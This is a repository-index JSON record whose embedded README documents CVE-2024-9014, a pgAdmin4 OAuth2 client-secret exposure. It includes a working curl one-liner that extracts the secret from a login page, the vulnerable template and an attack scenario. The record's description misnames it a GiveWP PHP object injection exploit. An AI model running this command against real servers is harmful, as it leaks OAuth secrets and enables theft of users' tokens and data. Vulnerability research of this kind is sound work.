{"id":23912007,"url":"https://github.com/eqstlab/cve-2024-9014","last_synced_at":"2026-03-01T19:33:27.912Z","repository":{"id":270801187,"uuid":"863460886","full_name":"EQSTLab/CVE-2024-9014","owner":"EQSTLab","description":"GiveWP PHP Object Injection exploit","archived":false,"fork":false,"pushed_at":"2025-01-12T11:25:57.000Z","size":588,"stargazers_count":7,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-23T17:47:36.720Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/EQSTLab.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-09-26T10:34:34.000Z","updated_at":"2025-02-19T07:19:54.000Z","dependencies_parsed_at":"2025-01-03T07:34:25.173Z","dependency_job_id":"b7712a50-6c90-4170-835e-21257a9b1029","html_url":"https://github.com/EQSTLab/CVE-2024-9014","commit_stats":null,"previous_names":["eqstlab/cve-2024-9014"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/EQSTLab/CVE-2024-9014","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-9014","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-9014/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-9014/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-9014/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/EQSTLab","download_url":"https://codeload.github.com/EQSTLab/CVE-2024-9014/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-9014/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29981439,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-01T16:35:47.903Z","status":"ssl_error","status_checked_at":"2026-03-01T16:35:44.899Z","response_time":124,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-01-05T08:57:49.335Z","updated_at":"2026-03-01T19:33:27.836Z","avatar_url":"https://github.com/EQSTLab.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"This post is a research article published by [EQSTLab](https://github.com/EQSTLab).\n\n\n# CVE-2024-9014\n★ CVE-2024-9014 Sensitive Information Exposure PoC ★\n\n\n## Description\nCVE-2024-9014 : pgAdmin4 Sensitive Information Exposure\n\ndescription: pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n\n\n## PoC\n### Command \n```sh\ncurl [URL_TO_TEST]/login?next=/ | grep -o '\"oauth2Config\": \\[.*\\]' | sed 's/\"oauth2Config\": //'\n```\n\n\n### Example \n```sh\ncurl http://localhost:8000/login?next=/ | grep -o '\"oauth2Config\": \\[.*\\]' | sed 's/\"oauth2Config\": //'\n```\n\n### Output\n**pgadmin4-8.9** and **pgadmin4-8.12**\n![alt text](1.png)\n\n\n# Analysis\n## Vulnerable point (pgadmin/templates/security/login_user.html)\nAt this point, the config.OAUTH2_CONFIG variable returns OAUTH2 configuration files including **OAUTH2_CLIENT_ID** and **OAUTH2_CLIENT_SECRET**.\n```sh\n{% set page_name = 'login_user' %}\n{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}\n{% set ns = namespace(langOptions=[]) %}\n{% for key, lang in config.LANGUAGES.items() %}\n{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}\n{% endfor %}\n{% set page_props = {\n    'userLanguage': user_language,\n    'langOptions': ns.langOptions,\n    'forgotPassUrl': url_for('browser.forgot_password'),\n    'loginUrl': url_for('authenticate.login'),\n    'csrfToken': csrf_token(),\n    'authSources': config.AUTHENTICATION_SOURCES,\n    'authSourcesEnum': {\n        'OAUTH2': config.OAUTH2,\n        'KERBEROS': config.KERBEROS,\n    },\n    'oauth2Config': config.OAUTH2_CONFIG,\n    'loginBanner': config.LOGIN_BANNER|safe\n} %}\n{% extends \"security/render_page.html\" %}\n\n\n```\n\n## Patch\n![alt text](2.png)\n\n\n# Scenario\n## Compromise private information\nIdentifying and protecting secret OAuth parameters is very important. While **“client_id”** can be safely disclosed, disclosing **“client_secret”** carries significant risk.\nIf the client_secret is compromised, an attacker can exploit the identity and trust of the application to steal the user's **“access token”** and personal information.\n\n\n# Disclaimer\nThis repository is not intended to be Exposured sensitive information to CVE-2024-9014. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.\n\n\n# EQST Insight\nWe publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.\nhttps://www.skshieldus.com/eng/business/insight.do\n\n\n# Reference\nhttps://nvd.nist.gov/vuln/detail/CVE-2024-9014\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feqstlab%2Fcve-2024-9014","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Feqstlab%2Fcve-2024-9014","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feqstlab%2Fcve-2024-9014/lists"}